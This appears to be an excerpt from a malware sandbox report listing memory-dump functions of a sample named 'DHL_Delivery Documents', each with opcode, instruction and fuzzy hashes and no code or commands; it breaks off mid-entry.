                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                        • Instruction ID: 0bad83a320054723c065942e80f5869e31b7f3288722aad899b20ddd11dd3896
                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                        • Instruction Fuzzy Hash: F9F0FC33214633DBD733565E8840BBBA7958FD5FA4F1902B5E2059B280C964CD01B6D5
                        Function 01CE62D6 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 41e894e47e3bcdd59de409519291110129f000e549065c5d2a33e7cbe37a276d
                        • Instruction ID: a516c7568aab79567be0f68170fec4a5a441b96b059f50f000a9100e5fdef1c9
                        • Opcode Fuzzy Hash: 41e894e47e3bcdd59de409519291110129f000e549065c5d2a33e7cbe37a276d
                        • Instruction Fuzzy Hash: 19018F71A10219EFCB04DFA9D445AAEBBF8FF58700F50402AF900E7390D674EE008BA4
                        Function 01CE625D Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: efe4b6eb32c8b1eaf42e44eb68bd560c93a9487e89a22e0fa77000793b0d6d35
                        • Instruction ID: dff6a16cc30484e9e5595bfe81cbde8aec5794ef40143494dec9d63688d2036a
                        • Opcode Fuzzy Hash: efe4b6eb32c8b1eaf42e44eb68bd560c93a9487e89a22e0fa77000793b0d6d35
                        • Instruction Fuzzy Hash: C2012C71A1025AEBCB04DFA9D455AAEB7F8FF58344F10406AF904E7351D674EA018BA4
                        Function 01C4CA6F Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                        • Instruction ID: 9b8f2c9f72e6b708397f05a992e3d593feee872b1fa0def3d514c6def71d8478
                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                        • Instruction Fuzzy Hash: EB01F432205685DBE322A71DC84AF59BF98EF81754F0844A5FA048BAB2D678D901C219
                        Function 01CE61E5 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 893bec62734eed80edc7fb570129179bf82dfae1955dd99a52ba7c340a6c82c7
                        • Instruction ID: b3f226d00eb3f4a1c963e431a79bfdb8fdc47d6fd7144025ca3ee7359576ab2d
                        • Opcode Fuzzy Hash: 893bec62734eed80edc7fb570129179bf82dfae1955dd99a52ba7c340a6c82c7
                        • Instruction Fuzzy Hash: 36014F71A10259DBDB04DFA9D445AEEBBF8FF58310F14405AE901A7380D774EA01CB99
                        Function 01C963C0 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                        • Instruction ID: 671a34e4d6cfea08df49b6168f13703fe175953e2e27e8b6018311209501f164
                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                        • Instruction Fuzzy Hash: 19F06D7220002DFFEF029F94CD80DAF7B7EEB582E8B104124FA0096060D235DE21ABA0
                        Function 01C9A4B0 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f74c352c7ef302173a7c8fe839b1543d1cfe28324213459454809c6a86f62ea3
                        • Instruction ID: 3a5c877bfbd94acd43d1cd9d0faabc5deb5780b3f5107107b7fdca1932182840
                        • Opcode Fuzzy Hash: f74c352c7ef302173a7c8fe839b1543d1cfe28324213459454809c6a86f62ea3
                        • Instruction Fuzzy Hash: 8D018536200249EBCF129E84D844EDA3F66FB4C764F068201FE1866220C332E970EF81
                        Function 01C0C0F0 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edccf9e94a1c03201dfab90529d42347caa20183727cc745c674eba4e36aec36
                        • Instruction ID: 7ea06676a303e03f5617bfecaa2a02b1b0855acc8baa5f1314b222f026830902
                        • Opcode Fuzzy Hash: edccf9e94a1c03201dfab90529d42347caa20183727cc745c674eba4e36aec36
                        • Instruction Fuzzy Hash: D0F02472204341DBF3169699DC05F2232DAE7C0750F2580EAEB058B2C1EF70DD0183D8
                        Function 01C4656A Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbf84511f15fba256392a334bb9896d1127e9d8ee19f8836620763f55a919803
                        • Instruction ID: 5c24c37a2d5e67d7d60ec4068925ac4bbcd2672988a528b2e8696aab41531728
                        • Opcode Fuzzy Hash: fbf84511f15fba256392a334bb9896d1127e9d8ee19f8836620763f55a919803
                        • Instruction Fuzzy Hash: D801A470204AC2DBF736A72CDD48B2537A8BB45B04F480190FA018BADAD768D9518614
                        Function 01CB437C Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                        • Instruction ID: 5a91c4424491ce3d70715e3ee6d10a3a7fedbcef4458e7e15f1c7ee4d1e25523
                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                        • Instruction Fuzzy Hash: 4CF0B43538AA23C7E739AA2E8490B6EA6559F90D50F0D052C9502CB642DF20DD00C790
                        Function 01C9C89D Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fa6c28b8321bd0b372c5fad38a8a55e812a12f77a17e1e49abb8c58966009f7
                        • Instruction ID: 88ce50f0a15d9580f2abf3f2159462494d8384487fd4a66d3fa32da54134f77d
                        • Opcode Fuzzy Hash: 0fa6c28b8321bd0b372c5fad38a8a55e812a12f77a17e1e49abb8c58966009f7
                        • Instruction Fuzzy Hash: A5F0AF70619344DFC714EF28C445A1BBBE4FF98710F40465ABC98DB394E634EA01C79A
                        Function 01C9E872 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                        • Instruction ID: 6ae5184d67194c1a0c74cda3f179b265673fe3f4d84d866bda58636be8a9c0d0
                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                        • Instruction Fuzzy Hash: 34F05E32711662DBEB21DE8ECC84F16B7A8AFE9A60F190165A6049F660C760EC02C7D4
                        Function 01C40854 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                        • Instruction ID: cbc9519abcc16c3d58c7ce9d6469470ea63716308a1956dbd034fe2526f79c89
                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                        • Instruction Fuzzy Hash: 7FF02472600200EFE314DF21CD01F96B6E9EF98300F148078AA45C71A0FAB0DE10DA54
                        Function 01C9C912 Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 707b2206324a5642bd8195bc79a7a3f338ee338b641dda2addc0cb9ced2de255
                        • Instruction ID: ace51192f2727cdd051f3539289257c75071f0514f77e9a26c9dd7ececbc35cb
                        • Opcode Fuzzy Hash: 707b2206324a5642bd8195bc79a7a3f338ee338b641dda2addc0cb9ced2de255
                        • Instruction Fuzzy Hash: D7F06270A01289DFCB14EF69C515A5EB7B4FF58300F108056B955EB385DA38EB01CB54
                        Function 01C147FB Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a123e610bd6d1816af19b870fb88e2b6fb2eff54e272f92c1af43348baa3f14f
                        • Instruction ID: 063e683972175601fc9e3fc5e788601d211db57c7014227f75be53452673e137
                        • Opcode Fuzzy Hash: a123e610bd6d1816af19b870fb88e2b6fb2eff54e272f92c1af43348baa3f14f
                        • Instruction Fuzzy Hash: 1CF02E319862E0CFF73ACB2CC008B21BBC59B02734F08C96ADD89C7106C330DA80E610
                        Function 01CD0115 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e558354b97d036925f9c719a5c9b46106d18110d8b11e648877232b5b2dac966
                        • Instruction ID: 59d602e940540ed7498f416c096c079c68e7b745ef913efcb52afaf7a2a02f01
                        • Opcode Fuzzy Hash: e558354b97d036925f9c719a5c9b46106d18110d8b11e648877232b5b2dac966
                        • Instruction Fuzzy Hash: D6F0552641A6C1CACF336B7C78903D12F64A791410F09108DEAA16730AC974CAB3C320
                        Function 01C4C5ED Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55bd7fc93bdfbe3bae783dc92298db0f18901540b4eb28cc2fd6051b63d1f649
                        • Instruction ID: 484c823d73598909ba8b26010663a3c5a2982dd52baa9f8cb045e694e61328ae
                        • Opcode Fuzzy Hash: 55bd7fc93bdfbe3bae783dc92298db0f18901540b4eb28cc2fd6051b63d1f649
                        • Instruction Fuzzy Hash: 12F0E27151BA51DFE3229B1CC148BD1BBD89B007A1F09D575D416C7532C770E980CA59
                        Function 01C52619 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                        • Instruction ID: 8367a45c7271d8873128de6a198e69c7215583098412d4e7edb1c8f4341d1a14
                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                        • Instruction Fuzzy Hash: 82E0D832300601EBE7519E59CCC0F5777AEDFD6B10F040479B9045F252CAE6DD4982B8
                        Function 01CA6030 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                        • Instruction ID: b46cf14f5ff70f6f5f3310fd81b2861d78285c022de3e8c8b7bd505cc74f97c2
                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                        • Instruction Fuzzy Hash: 38F06572144615DFE3228F0AD944F93BBF8EB05368F89C025E6099B561D379EC80CBA8
                        Function 01C10710 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                        • Instruction ID: 4e9c5a25a2595520be48d14aa4dd6a1e6fb6d73c3b8eee6d4791cf2584364902
                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                        • Instruction Fuzzy Hash: FDF0E539204345DBDB16DF1AD040A957BA8FB46350F004059F8428B301D731E9D1DB95
                        Function 01C449D0 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                        • Instruction ID: 022480c0e706023d06ae9f7849a072cd6d495a0c0e4f0f293027458412cb3629
                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                        • Instruction Fuzzy Hash: EDE0D83224C545EFD3251E598802B6677B5DBD07A1F250439E2008B150DF74DC40D7D8
                        Function 01CE4164 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c92fdf69258e5e1b6737d705019aeeabe7041612f125f526098e8eb40d507946
                        • Instruction ID: 2182996760a3a7e002c66285f85a3e4bc5544b9d7949a03389ed39f1625daca7
                        • Opcode Fuzzy Hash: c92fdf69258e5e1b6737d705019aeeabe7041612f125f526098e8eb40d507946
                        • Instruction Fuzzy Hash: CBF02B32A25591CFEB7AD7ACE14CF5177E0AF50670F1A2594D400C7912C334DD80C650
                        Function 01CB678E Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                        • Instruction ID: 2e397ec32579dba0ac85f4ac8406a44a63c44349bed76901c2d434b577230278
                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                        • Instruction Fuzzy Hash: A0E0DF73A00120FBDB219799CD05FDBBFACDB90EA4F260064B600E7090E530DE00D690
                        Function 01CE08C0 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                        • Instruction ID: 58ba663cda24480f9b832f0d576e1eedeac7f0eea46dca72dd58eb5dfdb36dc8
                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                        • Instruction Fuzzy Hash: E7E09B31740395CBCB358A1EC145A53BBE8DF95660F158069E90547612C271F962C6D0
                        Function 01C125E0 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c15eaafb8125eeb277164ee9d82461f3eb8cc344b0682fdfb800812afe443a9e
                        • Instruction ID: 66663cebe8c0a0f5c3e20d22e8c4375a3b5f7c9019b6bb136452fcfc36eec252
                        • Opcode Fuzzy Hash: c15eaafb8125eeb277164ee9d82461f3eb8cc344b0682fdfb800812afe443a9e
                        • Instruction Fuzzy Hash: 9DE09232100594DBC322BF29DD01F8A7BDAEB65360F114515F11557194CB34E850E7C8
                        Function 01CCA456 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                        • Instruction ID: 81c8dfea05ec53ef8a03383b3ba22874295af29d677627126b1338a25858b162
                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                        • Instruction Fuzzy Hash: CDE06D31010651DBE736AF2AC80CB52BAE0AF50B11F14882CE096024B0D775DCC1EA40
                        Function 01C94000 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                        • Instruction ID: 5c044ee81ed26452e8c94b4af61f0e3e4539bc68e636c5a0479ea711bb429013
                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                        • Instruction Fuzzy Hash: 0DE0C234300345CFEB19CF19C184B627BB6BFD5A10F28C068A9488F205EB32E943CB40
                        Function 01C0823B Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                        • Instruction ID: f68a9ef64beea5829333f19e19e0828a911deb2ad23b3fa175ee0da67eae6d3c
                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                        • Instruction Fuzzy Hash: 57E08C31940A20EFDB322E16DC00F5176A5FB58B60F109929E082064A5C674EC81EA48
                        Function 01C12050 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83a73e9f9a2d8470c8a83b2747f96cbc2b1501971430082dd45c4fa1874e2dbf
                        • Instruction ID: 23d2111810fb4a5d4aecb8e6383ce6f35d670547ce3614d8fdacaa0d884d4cb4
                        • Opcode Fuzzy Hash: 83a73e9f9a2d8470c8a83b2747f96cbc2b1501971430082dd45c4fa1874e2dbf
                        • Instruction Fuzzy Hash: BCE08C321404A0ABC212FA5DDD10F8A779EEBA92A0F100221F15087298CA24EC10E794
                        Function 01C48A90 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                        • Instruction ID: a4f44adb6099ba6b0dd933bc886c7ccbdbd1f19564621a2066906c53233b4d68
                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                        • Instruction Fuzzy Hash: BDE08633515A14C7C728DE58D512B7277A4EF45B20F09463EA61347780C574E544C794
                        Function 01C66AA4 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                        • Instruction ID: 0d4aa93de4c783729f2bde0f89ba303cab416b3a99efc1c2fd34dd5d5c6899bb
                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                        • Instruction Fuzzy Hash: 3ED05E36511A60EFC3329F1BEA00C13BBF9FBC8E60705062EE54583920C770E806DBA0
                        Function 01C4E59C Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                        • Instruction ID: f4d4416efce11a791dd8c9fa478220f458f4f168951e21edfd27462b096a57a8
                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                        • Instruction Fuzzy Hash: EBD0A932204660ABD732AA1CFC00FD333E8BB8C764F060459F008C7050C374EC81CA84
                        Function 01C8E908 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                        • Instruction ID: 87b016c6a9bb86325d4a65e6b6710a316b8a89936c63283f34a5c009f3fe5e53
                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                        • Instruction Fuzzy Hash: 4CE08C31940680DBDF12EF59C680F8ABBB5BB84B40F180008A4085B220C234E900DB40
                        Function 01C0A0E3 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                        • Instruction ID: 29852cb6aa26ecf6f510d49133f21800329c4a58829d4e9306fe56ac362c267c
